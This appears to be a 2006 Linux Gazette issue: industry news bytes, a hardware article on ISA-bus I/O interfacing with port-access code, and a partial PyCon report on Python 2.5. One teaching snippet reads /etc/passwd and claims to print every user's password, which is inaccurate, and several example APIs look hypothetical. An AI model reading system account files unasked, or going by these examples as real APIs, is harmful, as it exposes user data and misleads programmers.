...making Linux just a little more fun!
Please submit your News Bytes items in plain text; other formats may be rejected without reading. [You have been warned!] A one- or two-paragraph summary plus a URL has a much higher chance of being published than an entire press release. Submit items to bytes@linuxgazette.net.
At the RSA 2006 Security Conference, both Red Hat's Enterprise Linux 4 and Novell's SUSE LINUX Enterprise Server 9 [on IBM eServers] were cited for achieving the Controlled Access Protection Profile under the Common Criteria for Information Technology Security Evaluation, known as CAPP/EAL4+. Sun also revealed plans to apply for CAPP/EAL4 and for the Labeled Security Protection Profile (LSPP).
Rather than release another Trusted Solaris compilation, Sun will leverage its Solaris 10 OS with the release of Solaris Trusted Extensions [a beta is due in April or May], which enhance the security features of Solaris 10 to EAL4 levels.
In a March 1st memo to HP CEO Mark Hurd [and sent by Sun to the media and posted on its web site], Sun CEO Scott McNealy said HP should commit to converging HP-UX with Sun's Solaris 10 Unix. This would allow HP customers to use X86 servers with Intel's Xeon and AMD's Opteron processors.
HP currently offers Linux and Windows on its industry-standard x86 servers but has committed to supporting HP-UX only on the 64-bit Itanium architecture. McNealy pointed out that HP supports 64-bit Solaris 10 on its ProLiant servers.
McNealy called the move of HP-UX to Intel's Itanium system "...an expensive and risky transition with an uncertain future."
See the full text at: http://www.sun.com/aboutsun/media/features/converge.html.
Oracle recently acquired its second open source DB engine, buying Sleepycat Software and its Berkeley DB barely 3 months after snapping up InnoDB, the innovative and highly touted transactional engine in MySQL 5. Broad reaction in the MySQL user community was down, dour, and damning [see links].
In response, MySQL is closing a deal to purchase Netfrastructure, the company founded by DB guru Jim Starkey. This means Starkey, creator and developer of InterBase and co-creator of Firebird, will become a MySQL employee. MySQL will continue to support Netfrastructure customers during a transition period. Prior to this, Oracle held purchase discussions with MySQL officials. [specifics were not released]
The Oracle purchase deftly controls key components of MySQL's offerings and introduces uncertainty about future offerings from MySQL. The InnoDB transaction engine was important because it is ACID-compliant. Hiring Jim Starkey means MySQL will probably create a new transaction engine, perhaps forking from the existing InnoDB source code.
Rumors abound that Oracle is also considering purchasing JBoss and Zend Technologies. PHP-developer Zend featured prominently at the Oracle World mega-conference this fall and Oracle held sessions at the much smaller PHP Conference, clearly positioning itself as a major DB in the LAMP [or LA-Or-P] stack. This is consistent with Oracle's pursuit of Linux and LAMP as a platform independent of its competitors, especially Microsoft.
MySQL announced on Feb. 27 its hiring of Starkey, and also the hiring of a new chief technology officer, Taneli Otala, the former CTO of SenSage.
"It's not about the infrastructure; it's about the data", says a worried Shlomo Kramer, CEO of Imperva, a database security company in California, about threats to DBs and data integrity. Alexander Kornbrust, of Red Database Security GmbH, is developing rootkit-like technology that uses the DB's system functions to mask and manipulate processes and data changes. Worse still, such DB rootkits would be OS independent.
Check this link for more details: http://www.eweek.com/article2/0,1895,1914465,00.asp
The OpenVZ project now hosts a website to freely distribute its OpenVZ virtualization software, along with installation instructions, additional documentation, and access to various support options, including online chat. OpenVZ.org also provides a participation platform for feedback, shared experiences, bug fixes, feature requests, and knowledge-sharing with other users.
OpenVZ is operating system level virtualization technology, built on Linux, that creates isolated, secure virtual private servers (VPS) on a single physical server. OpenVZ, supported by SWsoft, is a subset of the Virtuozzo virtualization software product.
Open-Xchange, Inc., the vendor of open source collaboration software, made news in several ways this January.
Open-Xchange, Inc. now offers a free, fully functional 'Live-CD' of Open-Xchange Server 5 that gives users a cost-free way to test all the attributes of the Open Source alternative to Microsoft Exchange.
Built on KNOPPIX Linux, the Live-CD contains a complete edition of Open-Xchange Server 5 that boots directly from the CD-ROM, ensuring that the host computer is not modified in any way. Frank Hoberg, CEO, Open-Xchange Inc, explained, "This is not a polished, pre-run demo, but the real live product that will give everyone who uses it a good idea of what we offer."
It also announced the hiring of former IDC System Software Vice President Daniel Kusnetzky as Executive Vice President for Marketing Strategy. Kusnetzky is a noted expert on the Open Source industry and has been a staple keynote speaker at industry trade shows. He spent 11 years at IDC researching the worldwide market for operating environments and virtualization software and, before that, 15 years with Digital Equipment Corporation.
Finally, Open-Xchange announced that Systems Solutions Inc. of New York, has joined them as a strategic system integration partner. Systems Solutions helped in developing the SUSE Linux OpenExchange collaboration platform for the Americas.
Open-Xchange Server 5 was launched in April 2005 as a commercial product, and supports both Red Hat and SUSE Linux. The GPL version of Open-Xchange Server is downloaded more than 9,000 times each month. The Live-CD can be downloaded from www.open-xchange.com/live.
Novell announced the creation of the AppArmor security project early this year, a new GPL Open Source project dedicated to advancing Linux application security. AppArmor is an intrusion-prevention system that protects Linux and applications from viruses and malware. Novell acquired the technology in 2005 from Immunix, a leading provider of Linux security solutions.
AppArmor limits the interactions between applications and users by checking them against a tree of allowed interactions; unexpected behaviors are blocked. AppArmor builds its application profiles by working with a system administrator; another version includes predefined profiles for applications such as Apache, MySQL, and the Postfix and Sendmail email servers.
Novell AppArmor is already being shipped and deployed on SUSE Linux 10.0, Novell's community Linux distribution and its SLES (SUSE Linux Enterprise Server) 9 Service Pack 3.
CNET has awarded Firefox 1.5 its Editor's Choice award, and Firefox has received two awards from PC Magazine: the Technical Excellence Award for Software and the Best of 2005 Award. Firefox also garnered international recognition from UK-based PC Pro, receiving the publication's Real World Computing Award, and was chosen as "Editor's Choice" by the German-based PC Professionell magazine.
And, to accelerate adoption of Firefox, Mozilla has recently unveiled the second phase of "Firefox Flicks," its community-driven marketing campaign for the browser. The Firefox Flicks Ad Contest encourages professionals, students, and aspiring creatives in film and TV production, Web design, advertising and animation to submit high-quality 30-second ads about the browser. This new contest builds on the first phase of the campaign, which encouraged Firefox users worldwide to submit video testimonials about their experience with Firefox. More information about Firefox Flicks is available at www.firefoxflicks.com.
User Download [ 2.6.15.4 ]: ftp://ftp.kernel.org/pub/linux/kernel/v2.6/linux-2.6.15.4.tar.gz
Dev Download [ 2.6.16-rc5 ]: ftp://ftp.kernel.org/pub/linux/kernel/v2.6/testing/linux-2.6.16-rc5.tar.gz
Gentoo Linux 2006.0, the first release this year, came out in February and boasts many improvements since the 2005.1 version. Major highlights include KDE 3.4.3, GNOME 2.12.2, XFCE 4.2.2, GCC 3.4.4, and a 2.6.15 kernel.
SUSE Linux 10.1 Beta 5 was released in February. Check here for downloads: http://en.opensuse.org/Welcome_to_openSUSE.org
The Linux From Scratch community has announced the release of LFS 6.1.1. This release includes fixes for all known errata since LFS-6.1 was released. A new branch was created to test the removal of hotplug. This branch requires a newer kernel and a newer udev than what is currently in the development branch. Anyone who would like to help test this branch can read the book online, or download to read locally. If you prefer, you can check out the book's XML source from the Subversion repository and render it yourself:
svn co svn://svn.linuxfromscratch.org/LFS/branches/udev_update/BOOK/
http://www.linuxfromscratch.org/lfs/index.html
ZDNET reported that Novell is releasing a new graphics package for its SUSE Linux distro into the Open Source world. The package makes fuller use of advanced graphics chips to manage desktop windows and to render 3D and semi-transparent objects. Based on the widely used OpenGL libraries, XGL updates the interactions between X Window System software and modern graphics hardware.
XGL makes better use of video memory for overlaps and screen redraws and also supports vector graphics, which could replace many of the font bitmaps used in most Linux distros. The source code was originally released in January, but Novell is also adding a development framework for graphics plugins. [The Fedora project has a similar effort underway called AIGLX for 'Accelerated Indirect GL X'.]
The code and future releases will become part of the X.Org source tree and thus could be used by any *nix in the future. It will premiere in the next release of SUSE, expected in early summer.
This link shows XGL in action -- http://news.zdnet.com/i/ne/p/2006/transparency1_400x250.jpg
JBoss(R) Inc. has acquired the distributed transaction monitor and web services technologies owned by Arjuna Technologies and HP and will Open Source them for the JBoss Enterprise Middleware Suite (JEMS(TM)). This allows enterprise-quality middleware to be freely available to the mass market.
The acquisition includes Arjuna Transaction Service Suite (ArjunaTS), one of the most advanced and widely deployed transaction engines in the world with a 20-year pedigree, and Arjuna's Web Services Transaction implementation, the market's only implementation supporting both leading web services specifications -- Web Services Transaction (WS-TX) and Web Services Composite Application Framework (WS-CAF). This implementation is also one of the few that has demonstrated interoperability with other industry leaders such as Microsoft and IBM. The core Arjuna transaction engine will be the foundation of JBoss Enterprise Service Bus (ESB).
As a co-author of the WS-TX and WS-CAF specifications, Arjuna has developed an industrial-strength web services implementation that uniquely supports both specs. In the web services area, a line is being drawn between the specifications, with WS-TX supported by companies like Arjuna, Microsoft, and IBM and WS-CAF supported by Arjuna, Oracle, and Sun among others. With Arjuna's Web Services Transaction implementation as a core product, JEMS bridges the gap between these two camps and remains platform-independent.
JBoss expects to release ArjunaTS and Arjuna's Web Services Transaction implementation as open source JEMS offerings in Q1 2006 backed by JBoss Subscription services, training, and consulting. Like all JEMS products, these offerings will run independently as free-standing products or on any J2EE application server. For more information, visit www.jboss.com/products/transactions.
IBM is readying a special compiler for the new Cell Broadband Engine chip in the forthcoming Sony PlayStation 3. That chip has a 64-bit PPC core and 8 additional synergistic processor elements, or SPEs, for real-time processing of gameplay. Each SPE has 256 KB of local store and can read data into a 128-bit register for single-instruction, multiple-data (SIMD) tasks.
The Cell BE chip was developed in partnership with Sony and Toshiba and is well adapted to running immersive simulations and also in scientific and signal processing applications. IBM is offering the Cell as a processor option on its BladeCenter H chassis later this year.
The Cell compiler currently runs on Fedora Linux installations on 64-bit x86 computers. A port of Linux to Cell-based computers remains an unconfirmed option.
The Cell BE compiler implements SPE-specific optimizations, including support for compiler-assisted memory realignment, branch prediction, and instruction fetching. It addresses fine-grained SIMD parallelization as well as the more general OpenMP task-level parallelization. The goal is to provide near super-computer performance in commercial and consumer computers.
A report on the compiler and benchmarking the Cell is at this link : http://www.research.ibm.com/journal/sj/451/eichenberger.html and information on the project is at http://www.research.ibm.com/cell/.
XimpleWare recently announced the availability of version 1.5 of VTD-XML, for both C and Java. This is a next generation open-source XML parser that goes beyond DOM and SAX in terms of performance, memory usage and ease of use.
XimpleWare claims VTD-XML is the world's fastest XML parser, 5x-10x faster than DOM and 1.5-3x faster than SAX, across a variety of file sizes. VTD-XML features random access with built-in XPath support. It also uses about a third of the memory of a DOM parser, which allows it to support large documents, up to 2 GB.
For demos, latest benchmarks, and software downloads, please visit http://vtd-xml.sf.net.
ClearNova's AJAX-enabled ThinkCAP JX™ rapid application development platform is now available as Open Source under GPL license for non-commercial distribution. AJAX (Asynchronous JavaScript and XML) is a set of programming techniques that allow Web applications to be much more responsive and provide usability on par with traditional client/server applications.
At the core of ThinkCAP's AJAX framework are two popular Open Source AJAX projects: prototype and script.aculo.us. These libraries provide excellent base functionality and are the two projects driving the AJAX functionality of the Ruby-On-Rails project.
ThinkCAP JX allows 4GL developers to rapidly build web-based applications without having to become Java, XML, and JavaScript experts. ThinkCAP JX is available for download at www.thinkcap.org.
ThinkCAP JX runs on any operating system and on Java application servers such as IBM WebSphere, BEA WebLogic, JBoss, Tomcat, Jetty, and Resin, among others.
Lexar Media, Inc., is bringing Google applications directly to customers by including Picasa, Google Toolbar and Google Desktop Search applications on its line of popular USB flash drives. The offering is the first time consumers will be able to install Google applications from a USB flash drive directly to their desktop.
Customers purchasing a Lexar JumpDrive simply plug the device into a USB port and are prompted with instructions for installing the free applications. If the user accepts the installation, the Google products install automatically and are then removed from the USB flash drive.
In January, the WiMAX Forum began issuing certifications for products meeting the 802.16-2004 IEEE standard. Fully implemented, WiMAX supports a range of several miles and speeds of up to 40Mbps. The standard for mobile WiMAX, 802.16e, was ratified in December 2005.
Some last minute changes to the standard in late 2005 delayed these first certifications for products in the European-designated 3.5GHz radio frequency band. Certifications for the 2.5GHz radio frequency band used in the US will start in the middle of 2006. Equipment makers seeking certification include Redline Communications, Sequans Communications, and Wavesat. Find more WiMAX info here: http://www.eweek.com/article2/0,1895,1912528,00.asp
Also see: "Silicon Valley eyes wireless network" - a partnership sets a goal of 1,500 square miles of broadband access:
http://www.sfgate.com/cgi-bin/article.cgi?f=/c/a/2006/01/28/BUG4FGUPFQ1.DTL&hw=Wireless+bids&sn=005&sc=829
By combining quantum computation and quantum interrogation, scientists at the University of Illinois at Urbana-Champaign have found an exotic way of determining an answer to an algorithm... without ever running the algorithm.
Using an optical-based quantum computer, a research team led by physicist Paul Kwiat has presented the first demonstration of "counterfactual computation," inferring information about an answer, even though the computer did not run. The researchers reported their work in the Feb. 23 issue of Nature.
Quantum computers have the potential for solving certain types of problems much faster than classical computers. Speed and efficiency are gained because quantum bits can be placed in superpositions of one and zero, as opposed to classical bits, which are either one or zero. Moreover, the logic behind the coherent nature of quantum information processing often deviates from intuitive reasoning, leading to some surprising effects.
"It seems absolutely bizarre that counterfactual computation - using information that is counter to what must have actually happened - could find an answer without running the entire quantum computer," said Kwiat, a John Bardeen Professor of Electrical and Computer Engineering and Physics at Illinois. "But the nature of quantum interrogation makes this amazing feat possible."
"In a sense, it is the possibility that the algorithm could run which prevents the algorithm from running," Kwiat said. "That is at the heart of quantum interrogation schemes, and to my mind, quantum mechanics doesn't get any more mysterious than this."
Investor, philanthropist and co-founder of Microsoft Paul G. Allen unveiled a new Web site, www.PDPplanet.com, as a resource for computer history fans and those interested in Digital Equipment Corporation (DEC) systems and XKL systems. From a PDP-8/S to a DECSYSTEM-20 to a Toad 1, Allen's collection of systems from the late 1960s to the mid-1990s preserves the significant software created on these early computers.
Via the new Web site, registered users from around the world can telnet into a working DECsystem-10 or an XKL Toad-1, create or upload programs, and run them -- essentially stepping back in time to access an "antique" mainframe, and getting a sense of how it felt to be an early programmer.
Along with Allen's Microcomputer Gallery at the New Mexico Museum of Natural History and Science in Albuquerque (opening later this year) and the Computer History Museum in Mountain View, California, PDP Planet provides an important exploration of early computer technology.
It's MS bug season! iDefense has offered a bounty of $10,000 for uncovering major Windows flaws, but only if MS identifies them as critical. Previously, TippingPoint offered bug 'bonuses' of $1,000-20,000 as part of its Zero Day Initiative [http://www.zerodayinitiative.com/benefits.html].
In an email made public, MS was critical of offering any compensation for efforts now undertaken by computer security companies. "Microsoft believes that responsible disclosure, which involves making sure that an update is available from software vendors the same day the vulnerability is first broadly known, is the best way to protect the end user."
NetworkAnatomy, a Northern California wireless communications company, has taken the lead online in providing a low-cost [USD $175] "reality engineering" education series via its monthly OnLine-CTO emagazine. The goal is to overcome the lack of practical WiMAX training in the US, where very few WiMAX projects have been initiated and there is only a small pool of experienced engineers.
NetworkAnatomy's effort offers "how to" installments, with reference material and skill tests. Click the blinking "New Service -- OnLine-CTO" link at the www.networkanatomy.com website, subscribe, and dive into the WiMAX engineering series. NetworkAnatomy can also be contacted by email at onlinecto@networkanatomy.com.
Robotics Trends and IDG World Expo announced in January that Carnegie Mellon University's Robot Hall of Fame will hold its 2006 induction ceremony at the 3rd annual RoboBusiness Conference and Exposition, the international business development event for mobile robotics and intelligent systems.
The conference and exposition will be held in Pittsburgh, PA on June 20-21, 2006. The event website is http://www.robobusiness2006.com
According to Dan Kara, conference chairman and President of Robotics Trends, Inc., "We are extremely pleased to announce that the 2006 Robot Hall of Fame induction ceremony will be part of the RoboBusiness Conference and Exposition. The Robot Hall of Fame induction adds a great deal of excitement, energy, prestige and glamour to the RoboBusiness event. Past inductees to the Robot Hall of Fame include some of the most significant and well known robots in the world including Honda's Asimo, NASA's Mars Pathfinder and Unimate, the first industrial robot arm that worked on the assembly line. The Robot Hall of Fame jurors are an equally distinguished collection of international scholars, researchers, writers, and designers including Gordon Bell, Arthur C. Clarke, Steve Wozniak, Rodney Brooks and others. With the addition of the Robot Hall of Fame induction ceremony, the RoboBusiness event becomes even more impactful, and certainly more entertaining."
Talkback: Discuss this article with The Answer Gang
Howard Dyckoff is a long term IT professional with primary experience at
Fortune 100 and 200 firms. Before his IT career, he worked for Aviation
Week and Space Technology magazine and before that used to edit SkyCom, a
newsletter for astronomers and rocketeers. He hails from the Republic of
Brooklyn [and Polytechnic Institute] and now, after several trips to
Himalayan mountain tops, resides in the SF Bay Area with a large book
collection and several pet rocks.
Abstract: The parallel port is a very popular choice for interfacing. Although the parallel port provides 8 data output lines plus the CONTROL and STATUS pins, this is often not sufficient for complex projects that require more data I/O lines. This project shows how to get 32 general-purpose I/O lines by interfacing with the ISA bus. Though the PCI bus is also a candidate for interfacing experiments, its greater speed and feature-rich nature make it far more complex, in both hardware and software, for beginners. This project can be a stepping stone for those thinking of ultimately getting to the PCI bus for interfacing experiments. It can also be useful for those thinking of building a PC-based digital oscilloscope, A/D and D/A converters, a microcontroller programmer, etc.
First, let's get familiar with the ISA connector:
We have designated as X(n) the side that contains components on all standard ISA cards. Similarly, Y(n) is the side that contains the solder. It is very important for you to be clear on the above convention: you will damage your motherboard if you mistake one for the other.
Descriptions of the most commonly used pins are given below:
* these pins will not be used in this project
Before going into the details of the full project let's examine the part that handles the four 8-bit output lines. The addresses in the range 0x338 to 0x33B were not in use by any devices for input/output operations in our computer.
The three 74LS138 ICs handle the address decoding. We configured the circuit to produce a short pulse on the CLOCK line (represented by green lines on the schematic) whenever an address in the range 0x338 to 0x33B and port output (IOW) is requested.
Whenever the 74LS374 gets a CLOCK pulse it latches in the 8-bit data present in the data bus. 74LS245 is a 3-state Octal Bus Transceiver. It reduces DC loading by isolating the data bus from external loads.
[ This is true, at least in theory. Don't use the output to power your favorite toaster oven, and avoid shorting it to Vss or Vcc; anything other than an optocoupler may not isolate quite as well as the manufacturer promises, and IC shrapnel is difficult to pick out of the ceiling. -- Ben ]
To figure out which I/O port addresses are available for use in this project, we examined the contents of ioports in the /proc directory of our Linux system:
[root@thelinuxmaniac ~]# cat /proc/ioports
0000-001f : dma1
0020-0021 : pic1
0040-0043 : timer0
.......................
01f0-01f7 : ide0
0378-037a : parport0
037b-037f : parport0
03c0-03df : vga+
.......................
It is clear from the above output that the addresses 0x238-0x23B and 0x338-0x33B are not being used by any device. This is often the case on most computers. However, if these addresses are occupied by some device, then you will have to change the wiring of the address lines to the three 74LS138 ICs. We'll describe the address decoding technique briefly so that you can set up available addresses for the I/O device you are trying to build.
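If you'd rather script this check than eyeball the listing, a few lines of Python will do. This is only a convenience sketch, with the port ranges hard-coded to the ones used in this project; run it on the machine that will host the card:

# Minimal sketch: parse /proc/ioports and warn if our chosen port
# ranges (0x338-0x33B and 0x238-0x23B) collide with a registered device.
WANTED = [(0x338, 0x33B), (0x238, 0x23B)]

for line in open("/proc/ioports"):
    span, name = line.split(":", 1)
    lo, hi = [int(x, 16) for x in span.split("-")]
    for (wlo, whi) in WANTED:
        if lo <= whi and wlo <= hi:        # the two ranges overlap
            print "conflict: %04x-%04x used by %s" % (lo, hi, name.strip())

If the script prints nothing, the addresses are free.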
We used the 74LS138, a 3-to-8 line decoder, for address decoding. Suppose we want to assign the addresses 0x338-0x33B to four 8-bit output lines and 0x238-0x23B to four 8-bit input lines. The binary equivalents of these addresses are:
Address | A15 A14 A13 A12 A11 A10 A9 A8 | A7 A6 A5 A4 A3 A2 A1 A0
--------+--------------------------------+------------------------
0x338   |  0   0   0   0   0   0   1  1  |  0  0  1  1  1  0  0  0
0x339   |  0   0   0   0   0   0   1  1  |  0  0  1  1  1  0  0  1
0x33A   |  0   0   0   0   0   0   1  1  |  0  0  1  1  1  0  1  0
0x33B   |  0   0   0   0   0   0   1  1  |  0  0  1  1  1  0  1  1
0x238   |  0   0   0   0   0   0   1  0  |  0  0  1  1  1  0  0  0
0x239   |  0   0   0   0   0   0   1  0  |  0  0  1  1  1  0  0  1
0x23A   |  0   0   0   0   0   0   1  0  |  0  0  1  1  1  0  1  0
0x23B   |  0   0   0   0   0   0   1  0  |  0  0  1  1  1  0  1  1
The only address lines that change across the eight addresses are A8, A1, and A0 (the whole process of connecting wires to the 74LS138 ICs is like solving a puzzle!). Connect the remaining lines to the first two 74LS138s so that they produce a low output whenever the address bits on those lines match the fixed part of our addresses. Now connect the three changing lines to the third 74LS138. All 8 outputs of this IC are used to select the 74LS374 latches corresponding to the input and output addresses after being NORed with IOR and IOW; we used the 74LS02 to distinguish between memory I/O and port I/O addressing.
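You can double-check which bits the decoder has to look at with a few lines of Python:

# Which address bits differ among our eight port addresses?  Any bit
# that never changes can be matched by the first two 74LS138s; the
# changing bits go to the third one.
addrs = [0x338, 0x339, 0x33A, 0x33B, 0x238, 0x239, 0x23A, 0x23B]

changing = 0
for a in addrs:
    changing |= a ^ addrs[0]

print "changing bits:", [b for b in range(16) if changing >> b & 1]
# -> [0, 1, 8], i.e. A0, A1 and A8, just as described above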
74LS138 Truth Table

 G1 | G2 | C  B  A | Y0 Y1 Y2 Y3 Y4 Y5 Y6 Y7
----+----+---------+------------------------
 X  | H  | X  X  X | H  H  H  H  H  H  H  H
 L  | X  | X  X  X | H  H  H  H  H  H  H  H
 H  | L  | L  L  L | L  H  H  H  H  H  H  H
 H  | L  | L  L  H | H  L  H  H  H  H  H  H
 H  | L  | L  H  L | H  H  L  H  H  H  H  H
 H  | L  | L  H  H | H  H  H  L  H  H  H  H
 H  | L  | H  L  L | H  H  H  H  L  H  H  H
 H  | L  | H  L  H | H  H  H  H  H  L  H  H
 H  | L  | H  H  L | H  H  H  H  H  H  L  H
 H  | L  | H  H  H | H  H  H  H  H  H  H  L

Refer to the 74LS138 datasheet for details.
Now, finally, we are ready to describe the functioning of the complete circuit.
The three 74LS138 ICs are used for address decoding along with the two 74LS02s (2-input NOR gates). Whenever a match is found on the address lines, the respective output line Y(x) of the third 74LS138 IC (connected to the two 74LS02 ICs) goes LOW. These lines, along with IOW (and IOR), are connected to the NOR gates (74LS02), which produce a HIGH only when both inputs go LOW simultaneously.
Hence, the output is high only when:
1. the address on the bus matches one of our assigned addresses, driving the decoder output LOW, and
2. IOW (or IOR) is LOW at the same time, signalling a port I/O operation.
Remember, if we did not consider the second case, our device would conflict with memory I/O operations at the addresses 0x238-0x23B and 0x338-0x33B.
We can see in the circuit diagram that the output lines of NOR gates are connected to the CLOCK pins of the 74LS374 latch. So, whenever the above two cases match simultaneously, the CLOCK pulse is sent to the respective latch and the data that is present on the data bus at that moment is latched in.
isa.c illustrates some simple coding methods to control and test the I/O lines of the device created in this project.
if (ioperm(OUTPUT_PORT, LENGTH + 1, 1)) { ... }   /* request access to the output ports; non-zero means failure */
if (ioperm(INPUT_PORT, LENGTH + 1, 1)) { ... }    /* request access to the input ports */
outb(data, port);    /* write a byte to the port */
data = inb(port);    /* read a byte from the port */
ioperm() obtains permission from the kernel to access the specified range of ports; outb() and inb() (defined in sys/io.h) write a byte to, and read a byte from, the specified port.
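For quick experiments without writing C, Linux also exposes raw port I/O through the /dev/port character device: seeking to offset N and transferring one byte is equivalent to inb()/outb() on port N. Here is a minimal Python sketch, assuming the output latch at 0x338 and the input latch at 0x238 as built above; it must run as root:

import os

PORT_OUT = 0x338    # base address of the four output latches
PORT_IN  = 0x238    # base address of the four input latches

fd = os.open("/dev/port", os.O_RDWR)   # needs root privileges
try:
    os.lseek(fd, PORT_OUT, 0)          # position at the output port...
    os.write(fd, chr(0x80))            # ...same effect as outb(0x80, 0x338)
    os.lseek(fd, PORT_IN, 0)           # position at the input port...
    value = ord(os.read(fd, 1))        # ...same effect as inb(0x238)
    print "input latch reads 0x%02x" % value
finally:
    os.close(fd)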
It is not easy to get a complex project to work just by reading an article like this. At some point you will need to debug your hardware. Hopefully, these debugging techniques will help you (as they have helped us - a lot!) to find the problem in your work. You will need a multimeter and some LEDs. What we learned while debugging is that LEDs are the best way to debug hardware of this nature when you don't have sophisticated debugging instruments. Some important techniques we discovered:
while (1) {
    outb(0x80, 0x338);    /* keep driving bit 7 of the output latch high, so you can probe it with an LED or multimeter */
}
There are lots of other debugging techniques which you will probably discover by yourself when you run into problems. Try to ensure that the wiring at the connector that goes into the ISA slot is correct. We checked every part of the device (every IC, all those jumper wires, etc.) and after debugging for about a week we found that IOW and IOR wires were connected to the wrong pins in the ISA slot. So, recheck the wiring. Fortunately, we did not mistake the 12V pin for a 5V pin! ;)
The photo of the device that we constructed is here.
You can get more details and photos related to this project at http://www.mycgiserver.com/~thelinuxmaniac/isa
Talkback: Discuss this article with The Answer Gang
I am studying Computer Engineering at the Institute of Engineering, Pulchowk Campus (NEPAL). I love to program in the Linux environment. I like coding in C, C++, and Java, and designing web sites (but not always). I like participating in online programming contests like those at topcoder.com. My interests keep changing, and I love reading books on programming and murder mysteries (Sherlock Holmes, Agatha Christie, ...) and watching movies.
My most distinct impression of Dallas was the birds. Two hundred on the electric wires. Another two hundred swoop in for the party. Others sit on nearby trees. Four times as many birds as I've ever seen in one place. All different kinds, all chirping loudly at each other. Now I know where birds go when they fly south for the winter: to Dallas. Especially to the intersection of Belt Line Road and the North Dallas Tollway. Around the intersection stand four or five steel-and-glass skyscrapers. Corporate execs watch the birds through their windows -- and get pooped on when they venture outside. But this isn't downtown; it's a suburb, Addison, with a shopping mall across the tollway. Behind CompUSA is the Marriott hotel where the Python conference took place.
PyCon was started three years ago as a low-budget developers' conference. It had always met at the George Washington University in Washington DC, but attendance has been growing by leaps each year and had reached the facility's capacity. After a nationwide search, the Python Software Foundation decided to sign a two-year contract with a Dallas hotel. That was partly because the Dallas organizers were so enthusiastic and hard-working, the hotel gave us an excellent deal, and we wanted to see how many people in the southern US would attend a conference if it were closer to home. There's no scientific count, but I did meet attendees from Texas, Utah, Arizona, Nevada, and Ohio, many of whom said they had never been to PyCon before. Overall attendance was 410, down from 450. Not bad considering the long move and the fact that many people won't go to Dallas because it's, well, Dallas. But the break-even point was in the high 300s so it didn't bust the bank. The layout had all the meeting rooms next to each other and there were sofas in the hallway, so it was easier to get to events and hold impromptu discussions than last year. The hotel staff was responsive; there were techs on-hand to deal with the sound system. The main problem was the flaky wi-fi, which will hopefully be improved next year (read "better be improved next year".) A hand goes out to Andrew Kuchling, who proved his ability not only in coding and documentation ("What's New in Python 2.x?") but also in conference organizing. This was his first year running PyCon, and he got things running remarkably smoothly.
There seemed to be more international attendees this year. I met people from the UK, Ireland, Germany, the Netherlands, Sweden, Japan, Argentina, and a German guy living in China. This is in spite of the fact that EuroPython and Python UK are now well established, and the main pycon.org site is now an umbrella covering both.
Here's the conference schedule. Several of the talks were audio- or video-recorded and will be available here.
Guido [1] delivered two keynotes. One was his usual "State of the Python Universe". The other was a look backward at Python's origins. The latter covered territory similar to this 2003 interview, which explains how Guido created Python to try out some language ideas and improve on ABC, a language he'd had both good and bad experiences with. He also explained why Python doesn't have type declarations: "Declarations exist to slow down the programmer." There you have it.
The state of the Python universe has three aspects: community activity, changes coming in Python 2.5, and changes coming in Python 3.0. There has been a lot of activity the past year:
An .egg is like a Java .jar file: a package that knows its version, what it depends on, and what optional services it can provide to other packages or take from other packages. This is similar to .rpm and .deb but is OS-neutral. It is expected that Linux package managers will eventually use eggs for Python packages. Eggs can be installed as directories or zip files.

easy_install.py is a convenient command-line tool to download and install Python packages (eggs or tarballs) in one step. It will get the tarball from the Python Cheese Shop [2] (formerly known as the Python Package Index), or scrape the Cheese Shop webpage for the download URL. You can also provide the tarball directly, or another URL to scrape. Regardless of whether the original was an egg or a simple tarball, EasyInstall will install it as an egg, taking care of the *.pth magic needed for eggs.
Waitress: Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon sausage and spam; spam bacon sausage and spam; spam egg spam spam bacon and spam....
Wife: Have you got anything without spam?
Waitress: Well, there's spam egg sausage and spam, that's not got much spam in it.
Wife: Could you do the egg bacon spam and sausage without the spam then?
--Monty Python's Spam skit
The first alpha is expected May 6; the final by September 30. Python 2.4.3 will be released in April, followed by 2.4.4, the last of the 2.4 series. What's New in Python 2.5 is unfinished but explains the changes better than I can.
The most sweeping changes are the generator enhancements (PEP 342) and the new with keyword (PEP 343). These allow you to write coroutines and safe blocks. "Safe" means you can guarantee a file will be closed or a lock released without littering your code with try/finally stanzas. The methodology is difficult to understand unless you have a Computer Science degree, but the standard library will include helper functions like the following:
#### OPENING/CLOSING A FILE ####
f = open("/etc/passwd", "r")
with f:
    for line in f:                  # Read the file line by line.
        words = line.strip().split(":")
        print words[0], words[1]    # Print everybody's username and password.
# The file is automatically closed when leaving this block, no matter
# whether an exception occurs, or you return or break out, or you simply
# fall off the bottom.

#### THREAD SYNCHRONIZATION ####
import thread
lock = thread.allocate_lock()
with lock:
    do_something_thread_unsafe()
# The lock is automatically released when leaving this block.

#### DATABASE TRANSACTION ####
with transaction:
    c = connection.cursor()
    c.execute("UPDATE MyTable SET ...")
# The transaction automatically commits when leaving this block, or
# rolls back if an exception occurs.

#### REDIRECT STANDARD OUTPUT ####
f = open("log.txt", "w")
with stdout_redirected(f):
    print "Hello, log file!"
# Stdout is automatically restored when leaving this block.

#### CURSES PROGRAMMING ####
with curses.wrapper2() as stdscr:   # Switch the screen to CURSES mode.
    stdscr.addtext("Look ma, ASCII graphics!")
# Text mode is automatically restored when leaving this block.
The same pattern works for blocking signals, pushing/popping the locale or decimal precision, etc.
Coroutines are generators that you can inject data into at runtime. Presumably the data will be used to calculate the next yield value. This not only models a series of request/response cycles, but it also promises to radically simplify asynchronous programming, making Twisted much more accessible. Twisted uses callbacks to avoid blocking, and that requires you to split your code into many more functions than normal. But with coroutines those "many functions" become a single generator.
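As a concrete taste of PEP 342, here is a toy coroutine written against the 2.5 syntax (a sketch, not production code): a generator that keeps a running average of whatever you send() into it.

def averager():
    # In 2.5, 'yield' becomes an expression: it evaluates to whatever
    # the caller passed to send().
    total = 0.0
    count = 0
    average = None
    while True:
        value = (yield average)
        total += value
        count += 1
        average = total / count

avg = averager()
avg.next()           # prime the generator: run up to the first yield
print avg.send(10)   # 10.0
print avg.send(20)   # 15.0
print avg.send(30)   # 20.0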
Other changes for 2.5 include:
* A conditional expression. Instead of C's ?: operator, it's now spelled: TRUE_RESULT if EXPRESSION else FALSE_RESULT. This echoes the list comprehension syntax, keeping Python consistent.
* New syntax in import statements to make relative imports obvious.
* any() and all(), which return true if any or all of their arguments are true.
* functional.partial.
* A dictionary that supplies a default value for missing keys (collections.defaultdict).
* Easy one-step package installation (easy_install.py).
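A few of these in action; this is a quick sketch based on the syntax as specified in the PEPs at the time of writing, so details may shift before the release:

n = 7
status = "even" if n % 2 == 0 else "odd"   # conditional expression
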